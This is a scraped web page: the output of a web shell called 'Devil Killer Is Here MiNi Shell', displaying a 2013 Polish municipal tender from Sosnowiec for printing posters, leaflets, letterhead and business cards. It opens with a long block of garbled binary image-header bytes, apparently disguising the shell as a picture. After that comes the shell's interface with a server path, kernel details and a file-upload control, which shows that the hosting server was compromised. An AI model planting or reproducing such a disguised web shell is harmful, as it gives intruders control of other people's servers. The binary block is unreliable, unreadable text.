JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130313/99996-N-2013.html

<p class="kh_header"><b>Sosnowiec: Zadanie 1. Druk materiałów poligraficznych niezbędnych do organizacji kampanii społecznych w 2013r. na terenie miasta Sosnowca.
Zadanie 2. Druk papierów firmowych i wizytówek</b><br>
<b>Numer ogłoszenia: 99996 - 2013; data zamieszczenia: 13.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sosnowiec - miasto posiadające prawa powiatu - reprezentowana przez Prezydenta Miasta , al. Zwycięstwa 20, 41-200 Sosnowiec, woj. śląskie, tel. 32 2960600, faks 32 296 06 05.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.sosnowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie 1. Druk materiałów poligraficznych niezbędnych do organizacji kampanii społecznych w 2013r. na terenie miasta Sosnowca.
Zadanie 2. Druk papierów firmowych i wizytówek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na druku materiałów poligraficznych niezbędnych do organizacji kampanii społecznych w 2013r. na terenie miasta Sosnowca oraz druk papierów firmowych i wizytówek. Przedmiot zamówienia zostaje podzielony na dwie części.
1. Część I zamówienia:
1.1. Przedmiotem zamówienia jest usługa polegająca na druku materiałów poligraficznych niezbędnych do organizacji kampanii społecznych w 2013r. na terenie miasta Sosnowca. 
Zakres przedmiotu zamówienia obejmuje: 
1. PLAKAT 
- format: B2;
- papier: kredowy błyszczący 200g/m2, w pełnym kolorze 4+0;
- opracowanie graficzne zostanie wykonane i dostarczone przez zamawiającego
(w wersji odręcznego projektu- do zeskanowania i oczyszczenia przez wykonawcę  lub w wersji cyfrowej projektu na nośniku w wysokiej jakości pliku .jpg lub .tiff o min. 300 dpi);
- w wypadku wersji odręcznej projektu wykonawca po zeskanowaniu naniesie w wyznaczonym miejscu dostarczone przez zamawiającego na nośniku logotypy sponsorskie;
- nakład: 300 sztuk; cały nakład zostanie zamówiony do wydrukowania i dostarczenia jednorazowo wraz z ulotkami; 
- wykonawca przekaże zamawiającemu wersję wydawnictwa na elektronicznym nośniku informacji w formacie pdf;
- w ramach świadczonej usługi wykonawca zobowiązany będzie do przygotowania naświetleń, rozbarwień oraz wszelkich niezbędnych prac związanych z wydrukowaniem plakatów.
2. ULOTKI 
- format: A5 -zapis dwustronny- format 210 mm x 148mm;
- papier: kredowy błyszczący 150g/m2, w pełnym kolorze 4+4:
- opracowanie graficzne zostanie wykonane i dostarczone przez zamawiającego (w wersji   odręcznego projektu - do zeskanowania i oczyszczenia przez wykonawcę  lub w wersji cyfrowej projektu na nośniku w wysokiej jakości pliku .jpg lub .tiff o min. 300 dpi);
- w przypadku umieszczania w ulotce fotografii, zostaną one dostarczone wykonawcy na nośniku przez zamawiającego w dniu złożenia zamówienia;
- nakład: 8000 sztuk (w tym dwa projekty po 4000 szt); cały nakład zostanie zamówiony do wydrukowania i dostarczenia jednorazowo wraz z plakatami; 
- wykonawca przekaże zamawiającemu wersję wydawnictwa na elektronicznym  nośniku informacji w formacie pdf;
- w ramach świadczonej usługi wykonawca zobowiązany będzie do przygotowania naświetleń, rozbarwień oraz wszelkich niezbędnych prac związanych z wydrukowaniem ulotek.
1.2. Termin wykonania i dostarczenia do Zamawiającego zamówionych materiałów liczony jest od dnia zaakceptowania przez Wykonawcę projektu - opracowania graficznego dostarczonego przez Zamawiającego. Termin ten nie może jednak wynosić więcej niż 8 dni roboczych od dnia złożenia zamówienia i przekazania materiałów do druku. W terminie wskazanym jako dzień realizacji zamówienia Wykonawca ma obowiązek dostarczyć wykonane materiały do siedziby Sosnowieckiego Centrum Organizacji Pozarządowych Plac Kościuszki 5, pokój 105, 41-200 Sosnowiec.
1.3. Materiał do druku zostanie przekazany do Wykonawcy faksem lub drogą elektroniczną (z potwierdzeniem odbioru) lub Wykonawca może odebrać materiał z siedziby Zamawiającego. 
2. Część II zamówienia:
2.1. Przedmiotem zamówienia jest druk papierów firmowych i wizytówek.  Ilość, rodzaj, parametry i charakterystyka zamawianego asortymentu: 
1. Papier firmowy z herbem miasta lub logotypem Sosnowca
Format: A4
Papier: Bond, biały
Gramatura: 90g/m2
Kolorystyka: 4+0	
Nakład: 5000 sztuk (minimalna zamawiana liczba jednorazowo - 1000 sztuk)
2. Wizytówka drukowana jednostronnie z herbem i logo typem Sosnowca, różne wersje danych, w języku polskim lub innym.
Format: 90mmx50mm
Papier: kreda matowa
Gramatura: 350g/m2
Kolorystyka: 4+0
Nakład - 1000 szt. bloczków (100 sztuk w bloczku)
3. Wizytówka drukowana dwustronnie z herbem i logotypem Sosnowca w dwóch językach, różne wersje danych,
Format 90mmx50mm,
Papier: kreda matowa
Gramatura: 350g/m2
Kolorystyka: 4+4
Nakład: 400 sztuk bloczków (100 sztuk w bloczku).
2.2. Przedmiot zamówienia realizowany będzie sukcesywnie, partiami w okresie od dnia zawarcia umowy do 31 grudnia 2013 roku na podstawie zamówień cząstkowych składanych przez pracownika Zamawiającego w dowolnej formie (zgłoszenia telefonicznego, faksem, e-mailem), w terminie do 5 dni roboczych od chwili otrzymania zamówienia. 
2.3. Przedmiot zamówienia każdorazowo po zgłoszeniu zapotrzebowania winien być dostarczony bez dodatkowych opłat do budynku głównego Urzędu Miejskiego w Sosnowcu, al. zwycięstwa 20,  pokój 502 D.
2.4. Kolorystyka wykonania papierów firmowych oraz wizytówek musi być zgodna z próbnikami PANTONÓW bez względu na rodzaj użytego papieru. 
2.5. Wybrany w trakcie postępowania Wykonawca otrzyma od Zamawiającego wzór papierów firmowych oraz wizytówek w formie druków akcydensowych zawartych w systemie identyfikacji wizualnej (wersja papierowa i pliki pdf). 2.6. W przypadku zmiany wzorów druków Zamawiający zastrzega możliwość ich zamiany w ramach umówionej ceny sprzedaży. 
2.7. Zamawiający w trakcie trwania umowy może dokonywać przesunięć ilościowych asortymentu według bieżących potrzeb i celowości ich zakupu wyłącznie w granicach kwoty wskazanej jako wartość zamówienia w umowie w sprawie zamówienia publicznego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku, dokona jego oceny na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał należycie przynajmniej 1 usługę o łącznym minimalnym zakresie: 
Dla części I zamówienia: 
Druk materiałów poligraficznych o wartości nie mniejszej niż 1.000,00 zł netto w ramach jednej umowy.
Dla części II zamówienia:
Druk materiałów poligraficznych o wartości nie mniejszej niż 5.000,00 zł netto w ramach jednej umowy.
UWAGA: Jeżeli oferta składana jest na dwie części wystarczającym będzie wykazanie spełnienia warunku opisanego dla części II zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku, dokona jego oceny na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku, dokona jego oceny na podstawie złożonego oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku, dokona jego oceny na podstawie złożonego oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykaz wykonanych, a w przypadku świadczeń okresowych i ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, wraz z załączeniem dowodów czy zostały wykonane. 
2.  Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, z załączeniem dokumentów dotyczących zakresu dostępnych wykonawcy zasobów innego podmiotu, sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonaniu zamówienia, charakteru stosunku, jaki będzie łączył wykonawcę z tym podmiotem oraz zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. 
3. Lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp, albo informacja o tym, że Wykonawca nie należy do grupy kapitałowej.
4. Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji  o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w sekcji III.4.3.1) niniejszego ogłoszenia, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Dokumenty te powinny być wystawione w terminach określonych w sekcji III.4.3.1) niniejszego ogłoszenia.
6. Jeżeli Wykonawca do podpisania oferty ustanowi swojego reprezentanta wówczas jest zobowiązany załączyć do oferty pełnomocnictwo. Pełnomocnictwo to musi w swej treści jednoznacznie wskazać dokładny zakres umocowania w tym uprawienie do podpisania oferty, być dołączone do oferty w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia następujących zmian w zawartej umowie:
- z uwagi na zmianę stawki podatku VAT - zmiana wynagrodzenia wykonawcy (ceny) o kwotę wynikającą ze zmienionych stawek tego podatku obowiązujących w dacie powstania obowiązku podatkowego w czasie trwania umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.sosnowiec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Sosnowcu 
Sosnowieckie Centrum Organizacji Pozarządowych 
al. Zwycięstwa 20, piętro 3, pokój 405
41-200 Sosnowiec lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2013 godzina 11:00, miejsce: Urząd Miejski w Sosnowcu 
Sosnowieckie Centrum Organizacji Pozarządowych 
al. Zwycięstwa 20, piętro 3, pokój 405
41-200 Sosnowiec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Druk materiałów poligraficznych niezbędnych do organizacji kampanii społecznych w 2013r. na terenie miasta Sosnowca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Część I zamówienia:
1.1. Przedmiotem zamówienia jest usługa polegająca na druku materiałów poligraficznych niezbędnych do organizacji kampanii społecznych w 2013r. na terenie miasta Sosnowca. 
Zakres przedmiotu zamówienia obejmuje: 
1. PLAKAT 
- format: B2;
- papier: kredowy błyszczący 200g/m2, w pełnym kolorze 4+0;
- opracowanie graficzne zostanie wykonane i dostarczone przez zamawiającego
(w wersji odręcznego projektu- do zeskanowania i oczyszczenia przez wykonawcę  lub w wersji cyfrowej projektu na nośniku w wysokiej jakości pliku .jpg lub .tiff o min. 300 dpi);
- w wypadku wersji odręcznej projektu wykonawca po zeskanowaniu naniesie w wyznaczonym miejscu dostarczone przez zamawiającego na nośniku logotypy sponsorskie;
- nakład: 300 sztuk; cały nakład zostanie zamówiony do wydrukowania i dostarczenia jednorazowo wraz z ulotkami; 
- wykonawca przekaże zamawiającemu wersję wydawnictwa na elektronicznym nośniku informacji w formacie pdf;
- w ramach świadczonej usługi wykonawca zobowiązany będzie do przygotowania naświetleń, rozbarwień oraz wszelkich niezbędnych prac związanych                                       z wydrukowaniem plakatów.
2. ULOTKI 
- format: A5 -zapis dwustronny- format 210 mm x 148mm;
- papier: kredowy błyszczący 150g/m2, w pełnym kolorze 4+4:
- opracowanie graficzne zostanie wykonane i dostarczone przez zamawiającego (w wersji   odręcznego projektu - do zeskanowania i oczyszczenia przez wykonawcę  lub w wersji cyfrowej projektu na nośniku w wysokiej jakości pliku .jpg lub .tiff o min. 300 dpi);
- w przypadku umieszczania w ulotce fotografii, zostaną one dostarczone wykonawcy na nośniku przez zamawiającego w dniu złożenia zamówienia;
- nakład: 8000 sztuk (w tym dwa projekty po 4000 szt); cały nakład zostanie zamówiony do wydrukowania i dostarczenia jednorazowo wraz z plakatami; 
- wykonawca przekaże zamawiającemu wersję wydawnictwa na elektronicznym  nośniku informacji w formacie pdf;
- w ramach świadczonej usługi wykonawca zobowiązany będzie do przygotowania naświetleń, rozbarwień oraz wszelkich niezbędnych prac związanych                                    z wydrukowaniem ulotek.
1.2. Termin wykonania i dostarczenia do Zamawiającego zamówionych materiałów liczony jest od dnia zaakceptowania przez Wykonawcę projektu - opracowania graficznego dostarczonego przez Zamawiającego. Termin ten nie może jednak wynosić więcej niż 8 dni roboczych od dnia złożenia zamówienia i przekazania materiałów do druku. W terminie wskazanym jako dzień realizacji zamówienia Wykonawca ma obowiązek dostarczyć wykonane materiały do siedziby Sosnowieckiego Centrum Organizacji Pozarządowych Plac Kościuszki 5, pokój 105, 41-200 Sosnowiec.
1.3. Materiał do druku zostanie przekazany do Wykonawcy faksem lub drogą elektroniczną (z potwierdzeniem odbioru) lub Wykonawca może odebrać materiał z siedziby Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Druk papierów firmowych i wizytówek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Część II zamówienia: 1.1. Przedmiotem zamówienia jest druk papierów firmowych i wizytówek.  Ilość, rodzaj, parametry i charakterystyka zamawianego asortymentu: 
1. Papier firmowy z herbem miasta lub logotypem Sosnowca
Format: A4
Papier: Bond, biały
Gramatura: 90g/m2
Kolorystyka: 4+0	
Nakład: 5000 sztuk (minimalna zamawiana liczba jednorazowo - 1000 sztuk 2. Wizytówka drukowana jednostronnie z herbem i logo typem Sosnowca, różne wersje danych, w języku polskim lub innym.
Format: 90mmx50mm
Papier: kreda matowa
Gramatura: 350g/m2
Kolorystyka: 4+0
Nakład - 1000 szt. bloczków (100 sztuk w bloczku)
3. Wizytówka drukowana dwustronnie z herbem i logotypem Sosnowca w dwóch językach, różne wersje danych,
Format 90mmx50mm,
Papier: kreda matowa
Gramatura: 350g/m2
Kolorystyka: 4+4
Nakład: 400 sztuk bloczków (100 sztuk w bloczku).
1.2. Przedmiot zamówienia realizowany będzie sukcesywnie, partiami w okresie od dnia zawarcia umowy do 31 grudnia 2013 roku na podstawie zamówień cząstkowych składanych przez pracownika Zamawiającego w dowolnej formie (zgłoszenia telefonicznego, faksem, e-mailem), w terminie do 5 dni roboczych od chwili otrzymania zamówienia. 
1.3. Przedmiot zamówienia każdorazowo po zgłoszeniu zapotrzebowania winien być dostarczony bez dodatkowych opłat do budynku głównego Urzędu Miejskiego w Sosnowcu, al. zwycięstwa 20,  pokój 502 D.
1.4. Kolorystyka wykonania papierów firmowych oraz wizytówek musi być zgodna z próbnikami PANTONÓW bez względu na rodzaj użytego papieru. 
